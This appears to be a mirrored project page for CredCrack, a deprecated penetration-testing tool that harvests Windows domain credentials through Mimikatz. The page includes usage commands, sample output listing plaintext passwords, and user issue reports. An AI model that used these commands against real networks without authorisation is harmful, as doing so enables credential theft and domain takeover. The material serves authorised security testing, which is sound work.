Giter Club home page Giter Club logo

credcrack's Introduction

CredCrack

โ›” [DEPRECATED]. This repo is no longer being maintained. Please consider using CrackMapExec.

Introduction


CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here

Help


usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples


Enumerating Share Access

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials


./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Contact

Contact me at @g0jhonny with any questions or features you'd like to see in the next update. For bugs submit an issue!

Credits

CredCrack couldn't have been possible without the contributions of the following individuals. You're all rockstars! @JosephBialek, @brav0hax, @altonjx and everyone else! Thank you for all your contributions and feedback to make this a better script, keep 'em coming!

credcrack's People

Contributors

bryant1410 avatar jobroche avatar r3dy avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

credcrack's Issues

Standalone servers

Hi Jonathan,

First of all thanks for your great piece of software.
I tried credcrack on a standalone Windows 2008 R2 server that is not part of a domain and received the following error:

[!] User is not an admin on 10.0.1.51 or the system is not joined to a domain

The command i runned
./credcrack.py -r 10.0.1.51 -d WORKGROUP -u administrator -l 10.0.1.20

So the question is why is it not possible to run credcrack on standalone servers?

[Errno 2] No such file or directory

./credcrack.py -d domain -u user -es -r 10.10.10.1


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[*] Validating 10.10.10.1
[!] Error listing shares on 10.10.10.1: [Errno 2] No such file or directory

I've always the same error whatever the options I use.
Is there a dependence i miss ?

I've try with "-F hosts"
but i got hte same message with all the IP adresses.
I've tried with a wrong password and it tells me the same...

Any idea ?
Do i need to be under Kali ?
I've a centos 7
;)

ValueError: zero length field name in format

Hello, i have an error when i execute the script:

ValueError: zero length field name in format

My python version is 2.6.6. I execute this line command:

./credcrack.py -d XXX -u XXX -f hosts -es

My exactly Error:

Traceback (most recent call last)
File "./credcrack.py", line415,
main()
File "./credcrack.py", line411, in main
print "{}[!]{} File: {} does not exist.".format'colors.red, colors.normal, args.file)
ValueError: zero length field name in format

Sorry for my bad english and thank you verymutch

Unable tor reach

Hi
thank you for you great work.

I've got this error when a use the credcrack.py

root@kali:~/Downloads/CredCrack-master# ./credcrack.py -d domaine -u user -f ip -l 10.247.192.217Password:


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[] Setting up the stage
[
] Validating 10.247.192.200
[] Validating 10.247.192.192
[
] Validating 10.247.192.182
[] Querying domain admin group from 10.247.192.200
[!] Unable to reach to 10.247.192.200
[
] Querying domain admin group from 10.247.192.192
[!] Unable to reach to 10.247.192.192
[*] Querying domain admin group from 10.247.192.182
[!] Unable to reach to 10.247.192.182

do you have any idea how to resolv this please ?

thank you !

Online documentation is not updated

Im Reading the (online) documentation and it says only domain and user are required. From what I see, the local host and the remote host are also required.

Also the documention is kind of sketchy on what the parameters are exactly needed and what they are for.

Servers with different languages fail

Hi John,

Today I used credcrack on a Dutch - Windows Server 2008 R2 installation and it fails because CredCrack can't query the Domain Admins group.

On a Dutch Windows Server 2008R2 installation the group name is "Domeinadministrators". I guess this Domain admin group is different on all other Windows servers installtions that are using an other language then English.

It might be an idea to gather all those group names and make an option for it in CredCrack?

Some more info:

The error message i receive from $output:

[] Setting up the stage
[
] Validating 192.168.178.23
[*] Querying domain admin group from 192.168.178.23

Kan de groepsnaam niet vinden.

Typ NET HELPMSG 2220 voor meer hulp.

[!] User is not an admin on 192.168.178.23 or the system is not joined to a domain

Translated:

Cant find groupname
Typ NET HELPMSG 2220 for more help.

no shell no error message

What could be the problem if I just got this:

root@kali:~/CredCrack# ./credcrack.py -d workgroup -r 192.168.122.237 -u Christian -l 192.168.122.25
Password:


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[] Setting up the stage
[
] Validating 192.168.122.237
[] Querying domain admin group from 192.168.122.237
[
] Cleaning up
root@kali:~/CredCrack#

The "list shares" works. Thank you

No loot?

Hello,

I have been playing around with credcrack on a domain. I can valitdate the hosts with no issue. Yet when I go to harvest details. It always comes back with no loot. The are members in the "domain admins" group. The are two screenshots below showing the information.

http://puu.sh/lqnfQ/5a924e0d25.jpg (Validating Hosts)
http://puu.sh/lqngY/bdc4a46775.jpg (Havesting)

Any idea's on why this is not working?

Thanks.

Output to file does not reflect the domain admins

When sending standard output to file in linux, highlights like yellow are not reflected in the output file.
Perhaps give a text clue to which credentials are domain admins, like (!) before the line. This way, when running this script and reviewing later from a file, the domain admins can still be identified.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.